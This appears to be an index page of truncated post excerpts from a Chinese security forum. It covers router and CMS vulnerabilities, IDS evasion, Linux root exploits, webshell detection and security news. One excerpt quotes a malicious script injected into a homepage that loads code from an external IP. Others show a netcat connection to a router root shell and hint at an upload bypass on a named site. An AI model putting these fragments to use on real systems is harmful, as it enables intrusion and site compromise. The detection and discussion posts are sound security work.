About the TP-Link Router TP-Link TL-WDR4300 is a popular dual band WiFi, SOHO class router. Tested Firmware We tested the remote root PoC on the newest firmware (published on 25.12.2012): TL-WDR4300 – tested firmware version The following info is provided for educational use only! We are also not resposible for any potential damages of the devices which are tested for this vulnerability. Proof of Concept root@secu:~# nc 192.168.0.1 2222 (UNKNOWN)
DEDECMS 通杀鸡肋注入一枚
by:冰封 ps:转载请带上 请注意版权 看到标题你一定很疑惑 为什么通杀 有鸡肋呢? 接下来看分析吧! 漏洞文件:/plus/feedback.php if($comtype
九种突破IDS入侵检测系统的实用方法
互联网的一篇老文,原始作者以无法考证,出现时间起码早于2007年,仅作参考。 入侵检测系统,英文简写为IDS,顾名思义,它是用来实时检测攻击行
这是挂马吗,是怎么做到的?
T00ls有人问: 主页总有 <script type="text/javascript">document.write(unescape('%3Cscript type="text/javascript" src="http://115.238.147.102/A0EED19F1C1CB08BDED1D52D5DA33474?id=2&t=457515&m=0226ec1ad7a6b93b"%3E%3C/script%3E'))</script> 我看了我的主页。任何地方都没有找到这一句话。。。。只有主页有这。。。 问题来了,求大牛解答。。。。 1.为什么
螳螂捕蝉黄雀在后
首先题目我是乱取的,文化水平差,不知道咋用词。呵呵 一次逛Pentester 大牛博客 发现 http://www.pentesting.cc/osmosis-kr-a-shopping-mall-systems-official-website.html 此篇文章。pent是大牛啊, 看题目是啥kr商城官网。
淘宝任意链接跳转漏洞+CSS流量劫持
最近群里有个朋友发了一个淘宝店铺,捉摸着应该是个淘宝客的,店铺卖的东西内容很杂!什么都有!而且所有流量都被点击劫持!经过逆向的分析发现了一个
Google将开放特定顶级域名 或进军域名业务
北京时间3月12日消息,据国外媒体报道,Google有意向外界开放某些通用顶级域名(简称“gTLD”),如.app、.blog、.Colud
公告:关于前两天本站无法打开的原因 + GFW拦截规则原理剖析
大家可能发现了,本站前两天无法访问,原因其实很简单,GFW在国内主要骨干网出入口完全屏蔽了本站域名及IP! 起因如何呢? 众所周知,本站服务器一
[讨论]如何入侵一个户外的电子显示屏
[讨论]如何入侵一个户外的电子显示屏 0x2b | 2013-03-08 14:44 环境:一个商场 目标:门外的一个显示屏 我在这个商场里逛悠 手贱拿手机搜索WIFI 发现有WIFI(笔记
探索网络出口GFW的强度与翻墙
探索GFW的白名单配置信息与翻墙 首先: GFW是双向屏蔽的,比如境外IP要给一个境内IP提交不法数据,会被GFW临时阻断5分钟 境内IP给境外I
查找Webshell的几个小工具
先给出地址:https://github.com/wofeiwo/webshell-find-tools Author: wofeiwo#80sec.com 这是我2010年初写的小脚本,主
另类劫持手机号码,我的联通卡被一鸟人复制,结果倒了我卡里2万多元钱!
另类劫持手机号码,我的联通卡被一鸟人复制,结果倒了我卡里2万多元钱,借此广告大家! 原帖出自:http://bbs.csdn.net/topi
大家总结下如何检测webshell
小胖胖要减肥 | 2013-03-04 12:01 1 最简单的比如php网站检测其他脚本,比如asp,aspx,asa等文件,记得哪个发过一个扫描器,地址忘记了,有的共享下 2
三星Galaxy设备惊现安全漏洞:可绕过锁屏
3月5日消息,据外媒报道,国外用户发现三星Galaxy系列的一些设备出现了可绕过锁屏进入首页和应用程序的安全漏洞,虽然该漏洞并不会泄露用户的
白宫支持智能机解锁合法化
据外媒报道,上月末有超过10万的美国民众向白宫请愿,要求美国国会图书馆取消智能手机运营商解锁禁令。白宫于当地时间本周一回应称,支持智能手机解
关于GPU破解的显卡选择
GPU破解的软件目前主流有这三种 1,EGB www.insidepro.com/eng/egb.shtml 收费软件,仅支持NVIDIA显卡,支持的MD5自定义算法灵活且多样。 2,IGHASHGPU http://www.golubev.com/hashgpu.htm 免费
获取 monlist 命令结果源码,NTP时间服务器 monlist 命令
Option Explicit Public Function HexToByte(ByVal Hex As String) As Byte() '将字符串形式的 Hex 值转换为 Byte 数组,例子:HexToByte("202020") Dim Tmp() As Byte, L As Long Hex = Trim(Replace(Hex, " ", "")) '处理字符串 L =
easysite系统,某奇葩管理诉讼漏洞...很蛋疼,求解?!!
今天进行 新东方网站的渗透测试。 无奈用谷歌搜索到分站一洞。 http://sh.xdf.cn/tabid/19944/ctl/Edit/mid/115438/InfoID/658009/Default.aspx 发现可上传asp;.jpg IIS6解析漏洞的格式。 但是因为
Archlinux x86-64 3.3.x-3.7.x x86-64 sock_diag_handlers[] Local Root
最近国外爆出的又一个linux local root,又是一个Null指针问题,利用起来也相当easy,各位看exp代码就可以有类似感受了。 http://www.exploit-db.com/exploits/24555/ http://pastebin.com/w0eDGAyq http://pastebin.com/L0PiRwmY 这里预
利用HTML5的localStorage快速挤占你的硬盘空间
利用HTML5的localStorage快速挤占你的硬盘空间,利用HTML5的localStorage占用你的硬盘空间。 虽然理论上Chrom
搭建adsl服务器/电信ADSL多拨,让宽带/网速飙升20m/30m/40m!
蛋疼的搭建adsl服务器,让网速飙升20m,30m,40m,方法亲测(电信用户)你行的! 1# 因为测试某个软件,需要adsl拨号,经常换ip,本
一个关于加密算法的简单讨论帖子
我的“加密算法” Lmy (话说名字太长容易被人关注) | 2013-02-27 01:40 Java: byte[] salt = new byte[512]; new SecureRandom().nextBytes(salt); MessageDigest digest = MessageDigest.getInstance("SHA-512"); digest.update(password.getByte(Charset.forName("UTF-7"))); digest.update(salt); 1# safe121 (http://zone.wooyun.org/?do=action&act=thankcontent&id=633) | 2013-02-27 05:14 <?php function encrypt($str){ return md5(sha1(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(base64_encode(sha1(md5(sha1(base64_encode($str).base64_decode($str))))))))))))))))); } ?> 2# 顺子 | 2013-02-27 05:19 @safe121 你亮爆了!我草。这加
PHP脚本程序源码,采集百度下拉框的数据
<html> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <link type="text/css" rel="stylesheet" href="http://zone.wooyun.org/themes/wooyun/css/style.css"/></head> <body> <?php /* another:VIP date:2013-2-26 */ $word=$_GET['word']; if ($word=="") { echo <<<EOF <form action="" method="get"> <p>关键词: <input type="text" name="word" /></p> <input type="submit" value="采集" /> </form> EOF; } else { $data=file_get_contents('http://suggestion.baidu.com/su?wd='.$word); $data=mb_convert_encoding($data, 'UTF-8', 'UTF-8,GBK,GB2312,BIG5' ); $data_temp=strpos($data,"x"); $data=substr_replace($data,"",$data_temp,17); $data = trim($data,");");
玩家利用网游漏洞刷道具 搜狐畅游封停大量账户
本报讯(记者潘珊菊)昨天,部分玩家反映,春节期间搜狐畅游的网络游戏《天龙八部》,发布每日签到即可领取奖品的活动,其间系统出现漏洞,玩家可不断
全球超半数僵尸网络控制中心在美国
2月19日,美国网络安全公司曼迪昂特(Mandiant)仅凭IP地址就发布报告,指责中国军方从事网络间谍活动,引起舆论广泛关注。该报告数据显
钻网游漏洞 编外挂获利千万
晨报讯(首席记者 王彬)编写外挂钻网游的漏洞,从中换取游戏道具,获利高达上千万元,海淀法院将择日开庭审理涉嫌破坏计算机信息系统罪的陈某等人一案
深喉CMS密码加密简要解析
0x01 代码分析 php版加密函数所在文件路径 %wwwRoot%\Deepthroat\inc\class.shlencryption.php 代码(加了一点注释): <?php class shlEncryption { var $enstr = null; function shlEncryption($str) { $this->enstr = $str; } function get_shal() { return sha1($this->enstr
这个谁敢发?怎么会有这个呢?(标题卖萌)
如果是渗透测试中需要使用的技术都发到渗透测试下面了,这个渗透纪实明显就想来抓人的. 咳咳... 还是讲讲有意思的故事吧,与某网站管理员的三年基情
中国黑客需要对我生活中的所有错误负责
美国政府机构和一些公司现在无论是公开还是私下都承认他们的安全受到了中国黑客的威胁。这让人感到震惊,不仅因为黑客入侵的广度和深度,而因为他们竟
memcached可能存在篡改对象导致的注入代码执行漏洞
memcached存储java对象时,可能存在篡改对象导致的注入代码执行漏洞。 memcached介绍:http://baike.baidu.